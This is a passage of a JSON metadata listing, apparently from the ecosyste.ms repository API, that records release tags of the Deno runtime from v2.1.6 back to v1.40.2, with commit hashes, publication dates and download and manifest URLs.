/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependen